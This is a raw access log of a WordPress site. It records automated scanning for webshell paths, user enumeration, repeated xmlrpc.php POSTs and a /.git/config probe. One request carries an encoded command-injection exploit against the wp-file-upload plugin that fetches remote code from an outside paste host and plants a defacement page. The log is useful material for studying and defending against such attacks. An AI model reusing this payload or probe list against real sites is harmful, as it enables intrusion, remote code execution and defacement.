139.99.68.31 - - [30/Mar/2025:03:32:57 -0400] "GET /wp-content/themes/travel/issue.php HTTP/1.1" 404 8271 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:03:32:58 -0400] "GET /wp-content/themes/jaida/lang.php HTTP/1.1" 404 8272 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:03:33:00 -0400] "GET /wp-l0gin.php HTTP/1.1" 404 8272 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:03:33:01 -0400] "GET /ext.php HTTP/1.1" 404 8271 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:03:33:02 -0400] "GET /wp-l0gin.php HTTP/1.1" 404 8272 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
198.54.114.83 - - [30/Mar/2025:03:51:22 -0400] "POST /wp-cron.php?doing_wp_cron=1743321081.6436629295349121093750 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://inversionesgoldie.com"
2602:fb54:3d9:: - - [30/Mar/2025:03:51:17 -0400] "GET /wp-content/plugins/WordPressCore/include.php HTTP/1.1" 404 8272 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
198.54.114.83 - - [30/Mar/2025:04:03:17 -0400] "POST /wp-cron.php?doing_wp_cron=1743321797.0466198921203613281250 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://inversionesgoldie.com"
45.148.10.237 - - [30/Mar/2025:04:03:13 -0400] "GET /react/16.8.0/react.production.min.js HTTP/1.1" 404 8272 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/121.0.0.0"
45.148.10.237 - - [30/Mar/2025:04:24:38 -0400] "GET /code/npm/@ali/lzd-h5-utils-icon/1.0.8/index.js HTTP/1.1" 404 8272 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 Chrome/120.0.0.0"
139.99.68.31 - - [30/Mar/2025:04:27:58 -0400] "GET /wp-content/uploads/2017-------/09/wp-console.php HTTP/1.1" 404 8271 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:04:27:59 -0400] "GET /wp-includes/js/crop/uword.php HTTP/1.1" 404 8272 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:04:28:00 -0400] "GET /wp-content/themes/bltm/wp-login.php HTTP/1.1" 404 8272 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:04:28:00 -0400] "GET /autoload_classmap.php HTTP/1.1" 404 8272 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:04:28:01 -0400] "GET /wp-content/uploads/2014/07/olx.php HTTP/1.1" 404 8272 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:04:28:02 -0400] "GET /wp-admin/css/colors/midnight/index.php HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:04:28:02 -0400] "GET /wp-admin/css/colors/midnight/ HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:04:28:03 -0400] "GET /wp-content/uploads/2020/wp-couldent.php.suspected HTTP/1.1" 404 8272 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:04:28:04 -0400] "GET /wp-content/plugins/523453244/ninja.php HTTP/1.1" 404 8272 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:04:28:07 -0400] "GET /wp-includes/js/imgareaselect/index.php HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:04:28:07 -0400] "GET /wp-includes/js/imgareaselect/ HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:04:28:09 -0400] "GET /wp-includes/PHPMailer/load.php HTTP/1.1" 404 8272 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:04:28:10 -0400] "GET /wp-links.php HTTP/1.1" 404 8272 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:04:28:10 -0400] "GET /wp-aa.php HTTP/1.1" 404 8272 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:04:28:11 -0400] "GET /wp-content/themes/travelscape/json.php HTTP/1.1" 404 8272 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:04:28:12 -0400] "GET /wp-content/themes/travel/issue.php HTTP/1.1" 404 8271 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:04:28:14 -0400] "GET /about.php HTTP/1.1" 404 8271 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:04:28:14 -0400] "GET /xx.php HTTP/1.1" 404 8272 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:04:28:15 -0400] "GET /wp-content/themes/digital-download/new.php HTTP/1.1" 404 8272 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:04:28:17 -0400] "GET /epinyins.php HTTP/1.1" 404 8272 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:04:28:18 -0400] "GET /wp-admin/dropdown.php HTTP/1.1" 404 8272 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:04:28:18 -0400] "GET /dropdown.php HTTP/1.1" 404 8272 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:04:28:19 -0400] "GET /wp-admin/css/index.php HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:04:28:19 -0400] "GET /wp-admin/css/ HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:04:28:21 -0400] "GET /wp-content/mah.php HTTP/1.1" 404 8272 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:04:28:22 -0400] "GET /wp-content/item.php HTTP/1.1" 404 8272 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:04:28:23 -0400] "GET /wp-content/plugins/shell/about.php HTTP/1.1" 404 8272 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:04:28:23 -0400] "GET /wp-content/plugins/pwnd/pwnd.php HTTP/1.1" 404 8271 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:04:28:24 -0400] "GET /wp-content/plugins/fix/up.php HTTP/1.1" 404 8272 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:04:28:25 -0400] "GET /wp-content/plugins/ph-file-manager/wp-file.php HTTP/1.1" 404 8272 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:04:28:26 -0400] "GET /wp-content/plugins/root-file-manager/wp-file.php HTTP/1.1" 404 8272 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:04:28:27 -0400] "GET /wp-content/plugins/wp-help/mini.php HTTP/1.1" 404 8272 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:04:28:28 -0400] "GET /wp-content/themes/travel/issue.php HTTP/1.1" 404 8271 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:04:28:28 -0400] "GET /wp-content/themes/jaida/lang.php HTTP/1.1" 404 8272 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:04:28:29 -0400] "GET /wp-l0gin.php HTTP/1.1" 404 8272 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:04:28:30 -0400] "GET /ext.php HTTP/1.1" 404 8271 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
139.99.68.31 - - [30/Mar/2025:04:28:31 -0400] "GET /wp-l0gin.php HTTP/1.1" 404 8272 "-" "Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36"
196.251.71.229 - - [30/Mar/2025:05:10:20 -0400] "GET / HTTP/1.1" 200 98560 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.71.229 - - [30/Mar/2025:05:10:20 -0400] "GET /wp-content/plugins/fix/up.php HTTP/1.1" 404 8272 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
196.251.71.229 - - [30/Mar/2025:05:10:20 -0400] "POST /ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 404 8225 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.71.229 - - [30/Mar/2025:05:10:20 -0400] "POST /wp-plain.php HTTP/1.1" 404 8225 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.71.229 - - [30/Mar/2025:05:10:20 -0400] "GET /wp-content/themes/seotheme/db.php?u HTTP/1.1" 404 8272 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.71.229 - - [30/Mar/2025:05:10:21 -0400] "GET /miabhglf.php?Fox=d3wL7 HTTP/1.1" 404 8271 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.71.229 - - [30/Mar/2025:05:10:21 -0400] "POST /alfacgiapi/perl.alfa HTTP/1.1" 404 8225 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
45.148.10.237 - - [30/Mar/2025:05:46:46 -0400] "GET /lzdmod/site-nav-pc/5.2.38/assets/logo-bar/index.js HTTP/1.1" 404 8271 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 Chrome/120.0.0.0"
196.251.88.242 - - [30/Mar/2025:06:23:29 -0400] "GET /geju.php HTTP/1.1" 404 8272 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
167.172.130.206 - - [30/Mar/2025:06:23:44 -0400] "GET / HTTP/1.1" 200 98560 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
167.172.130.206 - - [30/Mar/2025:06:23:47 -0400] "GET / HTTP/1.1" 200 98560 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.88.242 - - [30/Mar/2025:06:23:47 -0400] "GET /wp-content/plugins/about.php HTTP/1.1" 404 8272 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
198.54.114.83 - - [30/Mar/2025:06:23:51 -0400] "POST /wp-cron.php?doing_wp_cron=1743330230.7473969459533691406250 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://inversionesgoldie.com"
167.172.130.206 - - [30/Mar/2025:06:23:49 -0400] "GET /wp-includes/wlwmanifest.xml HTTP/1.1" 404 8271 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
167.172.130.206 - - [30/Mar/2025:06:23:53 -0400] "GET /?author=1 HTTP/1.1" 200 98560 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
167.172.130.206 - - [30/Mar/2025:06:23:55 -0400] "GET /?author=2 HTTP/1.1" 200 98560 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
167.172.130.206 - - [30/Mar/2025:06:23:56 -0400] "GET /wp-json/wp/v2/users/ HTTP/1.1" 200 1381 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
167.172.130.206 - - [30/Mar/2025:06:24:00 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
167.172.130.206 - - [30/Mar/2025:06:24:02 -0400] "POST /xmlrpc.php HTTP/1.1" 200 236 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
167.172.130.206 - - [30/Mar/2025:06:24:03 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
167.172.130.206 - - [30/Mar/2025:06:24:04 -0400] "POST /xmlrpc.php HTTP/1.1" 200 236 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
196.251.88.242 - - [30/Mar/2025:06:24:04 -0400] "GET /wp.php HTTP/1.1" 404 8274 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
167.172.130.206 - - [30/Mar/2025:06:24:05 -0400] "POST /xmlrpc.php HTTP/1.1" 200 236 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
167.172.130.206 - - [30/Mar/2025:06:24:06 -0400] "POST /xmlrpc.php HTTP/1.1" 200 236 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
146.190.89.71 - - [30/Mar/2025:06:38:41 -0400] "GET /heh.php HTTP/1.1" 404 8271 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
198.54.114.83 - - [30/Mar/2025:06:38:51 -0400] "POST /wp-cron.php?doing_wp_cron=1743331131.0379180908203125000000 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://inversionesgoldie.com"
146.190.89.71 - - [30/Mar/2025:06:38:50 -0400] "GET /wp-content/plugins/view-more/ioxi.php HTTP/1.1" 404 8271 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
146.190.89.71 - - [30/Mar/2025:06:39:11 -0400] "GET /wp-content/plugins/erinyani/baxa1.php HTTP/1.1" 404 8272 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
159.223.118.172 - - [30/Mar/2025:06:40:06 -0400] "GET /?rest_route=/wp/v2/users HTTP/1.1" 200 98560 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
46.8.57.209 - - [30/Mar/2025:06:46:47 -0400] "GET /building-true-team-spirit-for-peak-performance-in-sports-part-1/ HTTP/1.1" 200 13712 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:114.0) Gecko/20100101 Firefox/114.0"
196.251.88.242 - - [30/Mar/2025:06:50:18 -0400] "GET /wp-content/plugins/wp-catcher/index.php HTTP/1.1" 403 1242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
198.54.114.83 - - [30/Mar/2025:07:12:03 -0400] "POST /wp-cron.php?doing_wp_cron=1743333123.7669270038604736328125 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://inversionesgoldie.com"
45.148.10.237 - - [30/Mar/2025:07:12:03 -0400] "GET /lzdmod/site-nav-pc/5.2.38/pc/index.js HTTP/1.1" 404 8278 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/121.0.0.0"
196.251.88.242 - - [30/Mar/2025:07:15:33 -0400] "POST /wp-content/plugins/wp-file-upload/wfu_file_downloader.php?0=echo%20%60echo%20PD9waHAgZndyaXRlKGZvcGVuKCRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10uJy9oay5waHAnLCd3KycpLGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwczovL2dob3N0YmluLnNpdGUvb2NidmQvcmF3JykpOyBmd3JpdGUoZm9wZW4oJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2IweC5odG0nLCd3KycpLCdIYWNrZWQgYnkgUnhSJyk7Pz4=%20%7C%20base64%20--decode%60%3Ede.php;&file=p&ticket=H&handler=dboption&session_legacy=1&dboption_base=cookies&dboption_useold=0&wfu_cookie=wp_wpfileupload_9 HTTP/1.1" 403 1242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.88.242 - - [30/Mar/2025:07:15:45 -0400] "GET /wp-content/plugins/wp-file-upload/de.php HTTP/1.1" 403 1242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.88.242 - - [30/Mar/2025:07:15:52 -0400] "GET /hk.php HTTP/1.1" 403 1242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
198.54.114.83 - - [30/Mar/2025:07:33:20 -0400] "POST /wp-cron.php?doing_wp_cron=1743334400.3035280704498291015625 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://inversionesgoldie.com"
2602:fb54:3b5:: - - [30/Mar/2025:07:33:16 -0400] "GET /wp-content/plugins/WordPressCore/include.php HTTP/1.1" 404 8272 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
43.157.153.236 - - [30/Mar/2025:07:43:03 -0400] "GET / HTTP/1.1" 200 98560 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
205.210.31.56 - - [30/Mar/2025:07:43:46 -0400] "GET / HTTP/1.1" 200 98560 "-" "-"
185.208.158.226 - - [30/Mar/2025:07:57:02 -0400] "GET /.git/config HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"
198.54.114.83 - - [30/Mar/2025:08:05:22 -0400] "POST /wp-cron.php?doing_wp_cron=1743336322.5775399208068847656250 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://inversionesgoldie.com"
45.148.10.237 - - [30/Mar/2025:08:05:18 -0400] "GET /lzdmod/site-nav-pc/5.2.38/assets/common/popper/index.js HTTP/1.1" 404 8271 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/121.0.0.0"
198.54.114.83 - - [30/Mar/2025:08:10:05 -0400] "POST /wp-cron.php?doing_wp_cron=1743336605.8328599929809570312500 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://inversionesgoldie.com"
114.168.236.183 - - [30/Mar/2025:08:10:03 -0400] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0"
196.251.80.22 - - [30/Mar/2025:08:24:08 -0400] "GET / HTTP/1.1" 200 98560 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
198.54.114.83 - - [30/Mar/2025:08:24:11 -0400] "POST /wp-cron.php?doing_wp_cron=1743337451.6306569576263427734375 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://inversionesgoldie.com"
196.251.80.22 - - [30/Mar/2025:08:24:08 -0400] "POST /ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 404 8225 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.80.22 - - [30/Mar/2025:08:24:08 -0400] "POST /wp-plain.php HTTP/1.1" 404 8225 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.80.22 - - [30/Mar/2025:08:24:08 -0400] "GET /wp-content/themes/seotheme/db.php?u HTTP/1.1" 404 8272 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.80.22 - - [30/Mar/2025:08:24:08 -0400] "GET /wp-content/plugins/fix/up.php HTTP/1.1" 404 8272 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"
196.251.80.22 - - [30/Mar/2025:08:24:12 -0400] "GET /jyvpsxdz.php?Fox=d3wL7 HTTP/1.1" 404 8272 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
196.251.80.22 - - [30/Mar/2025:08:24:12 -0400] "POST /alfacgiapi/perl.alfa HTTP/1.1" 404 8225 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
198.54.114.83 - - [30/Mar/2025:08:27:15 -0400] "POST /wp-cron.php?doing_wp_cron=1743337634.9469029903411865234375 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://inversionesgoldie.com"
